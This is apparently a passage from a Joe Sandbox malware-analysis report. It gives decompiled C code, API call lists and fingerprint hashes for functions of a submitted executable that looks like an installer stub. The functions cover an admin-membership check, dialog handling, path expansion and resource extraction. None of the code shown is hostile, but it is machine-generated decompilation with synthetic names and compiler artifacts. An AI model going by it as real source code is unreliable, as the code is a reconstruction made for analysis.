                                                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                                                    						 *_t37 = 0;
                                                                                                                                                                                                    						_t28 = 1;
                                                                                                                                                                                                    						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                    							_t37 = _t39;
                                                                                                                                                                                                    							 *0x17a288(0, _v24, _v28);
                                                                                                                                                                                                    							_v20();
                                                                                                                                                                                                    							if(_t39 != _t39) {
                                                                                                                                                                                                    								asm("int 0x29");
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							FreeSid(_v24);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					FreeLibrary(_t36);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x001717f6
                                                                                                                                                                                                    0x001717fd
                                                                                                                                                                                                    0x00171805
                                                                                                                                                                                                    0x0017180b
                                                                                                                                                                                                    0x0017180d
                                                                                                                                                                                                    0x00171815
                                                                                                                                                                                                    0x00171818
                                                                                                                                                                                                    0x00171820
                                                                                                                                                                                                    0x00171824
                                                                                                                                                                                                    0x0017182c
                                                                                                                                                                                                    0x00171832
                                                                                                                                                                                                    0x00171837
                                                                                                                                                                                                    0x00171851
                                                                                                                                                                                                    0x00171854
                                                                                                                                                                                                    0x0017185d
                                                                                                                                                                                                    0x00171862
                                                                                                                                                                                                    0x0017186c
                                                                                                                                                                                                    0x00171872
                                                                                                                                                                                                    0x00171877
                                                                                                                                                                                                    0x0017187e
                                                                                                                                                                                                    0x0017187e
                                                                                                                                                                                                    0x00171883
                                                                                                                                                                                                    0x00171883
                                                                                                                                                                                                    0x0017185d
                                                                                                                                                                                                    0x0017188a
                                                                                                                                                                                                    0x0017188a
                                                                                                                                                                                                    0x001718a2

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001718DD), ref: 0017181A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0017182C
                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(001718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001718DD), ref: 00171855
                                                                                                                                                                                                    • FreeSid.ADVAPI32(?,?,?,?,001718DD), ref: 00171883
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,001718DD), ref: 0017188A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                    • API String ID: 4204503880-1888249752
                                                                                                                                                                                                    • Opcode ID: db1eda375bbcdb4fb33151307180b1947e4bbb53fac8f96da7bd4afeaaadcf4f
                                                                                                                                                                                                    • Instruction ID: 21bb726f386fcddbdc5e576737cb3db3bb2f1586dd7e45971c8d95da07db3de3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: db1eda375bbcdb4fb33151307180b1947e4bbb53fac8f96da7bd4afeaaadcf4f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4811B931E40209BFDB109FA4DC49ABEBB78EF84701F504569F919E3290DB309D408B92
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00173450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				struct HWND__* _t12;
                                                                                                                                                                                                    				int _t22;
                                                                                                                                                                                                    				struct HWND__* _t24;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t7 = _a8 - 0x10;
                                                                                                                                                                                                    				if(_t7 == 0) {
                                                                                                                                                                                                    					EndDialog(_a4, 2);
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t11 = _t7 - 0x100;
                                                                                                                                                                                                    				if(_t11 == 0) {
                                                                                                                                                                                                    					_t12 = GetDesktopWindow();
                                                                                                                                                                                                    					_t24 = _a4;
                                                                                                                                                                                                    					E001743D0(_t24, _t12);
                                                                                                                                                                                                    					SetWindowTextA(_t24, "nst0dum");
                                                                                                                                                                                                    					SetDlgItemTextA(_t24, 0x838,  *0x179404);
                                                                                                                                                                                                    					SetForegroundWindow(_t24);
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t11 == 1) {
                                                                                                                                                                                                    					_t22 = _a12;
                                                                                                                                                                                                    					if(_t22 < 6) {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t22 <= 7) {
                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                    						EndDialog(_a4, _t22);
                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t22 != 0x839) {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0x1791dc = 1;
                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x00173459
                                                                                                                                                                                                    0x0017345c
                                                                                                                                                                                                    0x001734d8
                                                                                                                                                                                                    0x001734de
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001734e0
                                                                                                                                                                                                    0x0017345e
                                                                                                                                                                                                    0x00173463
                                                                                                                                                                                                    0x0017349a
                                                                                                                                                                                                    0x001734a0
                                                                                                                                                                                                    0x001734a7
                                                                                                                                                                                                    0x001734b2
                                                                                                                                                                                                    0x001734c4
                                                                                                                                                                                                    0x001734cb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001734cb
                                                                                                                                                                                                    0x00173468
                                                                                                                                                                                                    0x0017346e
                                                                                                                                                                                                    0x00173474
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017347c
                                                                                                                                                                                                    0x0017348c
                                                                                                                                                                                                    0x00173490
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173496
                                                                                                                                                                                                    0x00173484
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173486
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173486
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00173490
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0017349A
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 001734B2
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000838), ref: 001734C4
                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 001734CB
                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 001734D8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                    • String ID: nst0dum
                                                                                                                                                                                                    • API String ID: 852535152-432003757
                                                                                                                                                                                                    • Opcode ID: 4e68f766f562ae1965fb229ffe3430605554ec1e973e9b0b704e232cbdfb38e7
                                                                                                                                                                                                    • Instruction ID: ae8c3f0713f4439e6a3378e4ec88941bc416cb93581deddd4acaf6e4ce3a97ed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e68f766f562ae1965fb229ffe3430605554ec1e973e9b0b704e232cbdfb38e7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE019E31294114ABD71E5F68DC0C96D3B74EF49711F90C020FA6F869A0CB319BD1EB95
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                    			E00172AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				char _t32;
                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                    				char* _t38;
                                                                                                                                                                                                    				char _t42;
                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                    				CHAR* _t52;
                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                    				CHAR* _t59;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				CHAR* _t64;
                                                                                                                                                                                                    				CHAR* _t65;
                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t60 = __edx;
                                                                                                                                                                                                    				_t16 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                    				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                    				_t65 = _a4;
                                                                                                                                                                                                    				_t44 = __edx;
                                                                                                                                                                                                    				_t64 = __ecx;
                                                                                                                                                                                                    				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                    					GetModuleFileNameA( *0x179a3c,  &_v268, 0x104);
                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                    						_t17 =  *_t64;
                                                                                                                                                                                                    						if(_t17 == 0) {
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                    						 *_t65 =  *_t64;
                                                                                                                                                                                                    						if(_t21 != 0) {
                                                                                                                                                                                                    							_t65[1] = _t64[1];
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if( *_t64 != 0x23) {
                                                                                                                                                                                                    							L19:
                                                                                                                                                                                                    							_t65 = CharNextA(_t65);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t64 = CharNextA(_t64);
                                                                                                                                                                                                    							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                    								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                    									if( *_t64 == 0x23) {
                                                                                                                                                                                                    										goto L19;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E00171680(_t65, E001717C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                    									_t52 = _t65;
                                                                                                                                                                                                    									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                    									_t60 = _t14;
                                                                                                                                                                                                    									do {
                                                                                                                                                                                                    										_t32 =  *_t52;
                                                                                                                                                                                                    										_t52 =  &(_t52[1]);
                                                                                                                                                                                                    									} while (_t32 != 0);
                                                                                                                                                                                                    									goto L17;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								E001765E8( &_v268);
                                                                                                                                                                                                    								_t55 =  &_v268;
                                                                                                                                                                                                    								_t62 = _t55 + 1;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t34 =  *_t55;
                                                                                                                                                                                                    									_t55 = _t55 + 1;
                                                                                                                                                                                                    								} while (_t34 != 0);
                                                                                                                                                                                                    								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                    								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                    									 *_t38 = 0;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								E00171680(_t65, E001717C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                    								_t59 = _t65;
                                                                                                                                                                                                    								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                    								_t60 = _t12;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t42 =  *_t59;
                                                                                                                                                                                                    									_t59 =  &(_t59[1]);
                                                                                                                                                                                                    								} while (_t42 != 0);
                                                                                                                                                                                                    								L17:
                                                                                                                                                                                                    								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t64 = CharNextA(_t64);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *_t65 = _t17;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                    			}






















                                                                                                                                                                                                    0x00172aac
                                                                                                                                                                                                    0x00172ab7
                                                                                                                                                                                                    0x00172abc
                                                                                                                                                                                                    0x00172abe
                                                                                                                                                                                                    0x00172ac3
                                                                                                                                                                                                    0x00172ac6
                                                                                                                                                                                                    0x00172ac9
                                                                                                                                                                                                    0x00172ace
                                                                                                                                                                                                    0x00172ae6
                                                                                                                                                                                                    0x00172bdc
                                                                                                                                                                                                    0x00172bdc
                                                                                                                                                                                                    0x00172be0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172af2
                                                                                                                                                                                                    0x00172afc
                                                                                                                                                                                                    0x00172b00
                                                                                                                                                                                                    0x00172b05
                                                                                                                                                                                                    0x00172b05
                                                                                                                                                                                                    0x00172b0b
                                                                                                                                                                                                    0x00172bca
                                                                                                                                                                                                    0x00172bd1
                                                                                                                                                                                                    0x00172b11
                                                                                                                                                                                                    0x00172b18
                                                                                                                                                                                                    0x00172b26
                                                                                                                                                                                                    0x00172b99
                                                                                                                                                                                                    0x00172bc8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172b9b
                                                                                                                                                                                                    0x00172bae
                                                                                                                                                                                                    0x00172bb3
                                                                                                                                                                                                    0x00172bb5
                                                                                                                                                                                                    0x00172bb5
                                                                                                                                                                                                    0x00172bb8
                                                                                                                                                                                                    0x00172bb8
                                                                                                                                                                                                    0x00172bba
                                                                                                                                                                                                    0x00172bbb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172bb8
                                                                                                                                                                                                    0x00172b28
                                                                                                                                                                                                    0x00172b2e
                                                                                                                                                                                                    0x00172b33
                                                                                                                                                                                                    0x00172b39
                                                                                                                                                                                                    0x00172b3c
                                                                                                                                                                                                    0x00172b3c
                                                                                                                                                                                                    0x00172b3e
                                                                                                                                                                                                    0x00172b3f
                                                                                                                                                                                                    0x00172b55
                                                                                                                                                                                                    0x00172b5d
                                                                                                                                                                                                    0x00172b64
                                                                                                                                                                                                    0x00172b64
                                                                                                                                                                                                    0x00172b7a
                                                                                                                                                                                                    0x00172b7f
                                                                                                                                                                                                    0x00172b81
                                                                                                                                                                                                    0x00172b81
                                                                                                                                                                                                    0x00172b84
                                                                                                                                                                                                    0x00172b84
                                                                                                                                                                                                    0x00172b86
                                                                                                                                                                                                    0x00172b87
                                                                                                                                                                                                    0x00172bbf
                                                                                                                                                                                                    0x00172bc1
                                                                                                                                                                                                    0x00172bc1
                                                                                                                                                                                                    0x00172b26
                                                                                                                                                                                                    0x00172bda
                                                                                                                                                                                                    0x00172bda
                                                                                                                                                                                                    0x00172be6
                                                                                                                                                                                                    0x00172be6
                                                                                                                                                                                                    0x00172bf8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00172AE6
                                                                                                                                                                                                    • IsDBCSLeadByte.KERNEL32(00000000), ref: 00172AF2
                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00172B12
                                                                                                                                                                                                    • CharUpperA.USER32 ref: 00172B1E
                                                                                                                                                                                                    • CharPrevA.USER32(?,?), ref: 00172B55
                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00172BD4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 571164536-0
                                                                                                                                                                                                    • Opcode ID: 97a707f99452b9021b1c7f30e9b1592e93c42f5cf8d6417dbae07ebccb09a327
                                                                                                                                                                                                    • Instruction ID: bdc93ad2924179743bd5e99596cc52682c8b15844bdb9909e3db1a149f4557c0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97a707f99452b9021b1c7f30e9b1592e93c42f5cf8d6417dbae07ebccb09a327
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA4126345082855FDB259F348C54AFD7BB99F96300F54809AE8CE87602DB758EC7CBA1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E001743D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				struct tagRECT _v24;
                                                                                                                                                                                                    				struct tagRECT _v40;
                                                                                                                                                                                                    				struct HWND__* _v44;
                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                    				int _v52;
                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                    				int _v60;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				void* _t53;
                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                    				int _t59;
                                                                                                                                                                                                    				struct HWND__* _t63;
                                                                                                                                                                                                    				struct HWND__* _t67;
                                                                                                                                                                                                    				struct HWND__* _t68;
                                                                                                                                                                                                    				struct HDC__* _t69;
                                                                                                                                                                                                    				int _t72;
                                                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t63 = __edx;
                                                                                                                                                                                                    				_t29 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                    				_t68 = __edx;
                                                                                                                                                                                                    				_v44 = __ecx;
                                                                                                                                                                                                    				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                    				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                    				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                    				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                    				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                    				_t69 = GetDC(_v44);
                                                                                                                                                                                                    				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                    				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                    				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                    				_t56 = _v48;
                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                    				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                    				_t67 = 0;
                                                                                                                                                                                                    				if(_t72 >= 0) {
                                                                                                                                                                                                    					_t63 = _v52;
                                                                                                                                                                                                    					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                    						_t72 = _t63 - _t56;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t72 = _t67;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                    				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                    				if(_t59 >= 0) {
                                                                                                                                                                                                    					_t63 = _v60;
                                                                                                                                                                                                    					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                    						_t59 = _t63 - _t53;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t59 = _t67;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                    			}
























                                                                                                                                                                                                    0x001743d0
                                                                                                                                                                                                    0x001743d8
                                                                                                                                                                                                    0x001743df
                                                                                                                                                                                                    0x001743e6
                                                                                                                                                                                                    0x001743ec
                                                                                                                                                                                                    0x001743f1
                                                                                                                                                                                                    0x00174400
                                                                                                                                                                                                    0x00174403
                                                                                                                                                                                                    0x0017440b
                                                                                                                                                                                                    0x00174420
                                                                                                                                                                                                    0x00174429
                                                                                                                                                                                                    0x00174437
                                                                                                                                                                                                    0x00174444
                                                                                                                                                                                                    0x00174447
                                                                                                                                                                                                    0x0017444d
                                                                                                                                                                                                    0x00174454
                                                                                                                                                                                                    0x0017445b
                                                                                                                                                                                                    0x00174460
                                                                                                                                                                                                    0x00174461
                                                                                                                                                                                                    0x00174467
                                                                                                                                                                                                    0x0017446f
                                                                                                                                                                                                    0x00174473
                                                                                                                                                                                                    0x00174473
                                                                                                                                                                                                    0x00174463
                                                                                                                                                                                                    0x00174463
                                                                                                                                                                                                    0x00174463
                                                                                                                                                                                                    0x0017447a
                                                                                                                                                                                                    0x00174481
                                                                                                                                                                                                    0x00174484
                                                                                                                                                                                                    0x0017448a
                                                                                                                                                                                                    0x00174492
                                                                                                                                                                                                    0x00174496
                                                                                                                                                                                                    0x00174496
                                                                                                                                                                                                    0x00174486
                                                                                                                                                                                                    0x00174486
                                                                                                                                                                                                    0x00174486
                                                                                                                                                                                                    0x001744b8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 001743F1
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0017440B
                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00174423
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0017442E
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0017443A
                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00174447
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 001744A2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2212493051-0
                                                                                                                                                                                                    • Opcode ID: 917923042d23b1d6c374855c091832244aaa1db5d3f742f7ff3465f355123437
                                                                                                                                                                                                    • Instruction ID: 3582d8b4ec91ed7fa879126e0d7608be7122eca0fc9d93402fc136d0cfee58b4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 917923042d23b1d6c374855c091832244aaa1db5d3f742f7ff3465f355123437
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03312D72E00119AFDB14CFB8DD899EEBBB5EF89310F554169F80AB3250DB306D458B60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                    			E00176298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                    				struct HINSTANCE__* _v36;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                    				struct HRSRC__* _t21;
                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                    				struct HINSTANCE__* _t51;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t44 = __edx;
                                                                                                                                                                                                    				_t16 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                    				_t46 = 0;
                                                                                                                                                                                                    				_v32 = __ecx;
                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                    				_t36 = 1;
                                                                                                                                                                                                    				E0017171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t51 = _t51 + 0x10;
                                                                                                                                                                                                    					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                    					if(_t21 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                    					if(_t45 == 0) {
                                                                                                                                                                                                    						 *0x179124 = 0x80070714;
                                                                                                                                                                                                    						_t36 = _t46;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                    						_t44 = _t5;
                                                                                                                                                                                                    						_t40 = _t44;
                                                                                                                                                                                                    						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                    						_t47 = _t6;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t26 =  *_t40;
                                                                                                                                                                                                    							_t40 = _t40 + 1;
                                                                                                                                                                                                    						} while (_t26 != 0);
                                                                                                                                                                                                    						_t41 = _t40 - _t47;
                                                                                                                                                                                                    						_t46 = _t51;
                                                                                                                                                                                                    						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                    						 *0x17a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                    						_t30 = _v32();
                                                                                                                                                                                                    						if(_t51 != _t51) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_push(_t45);
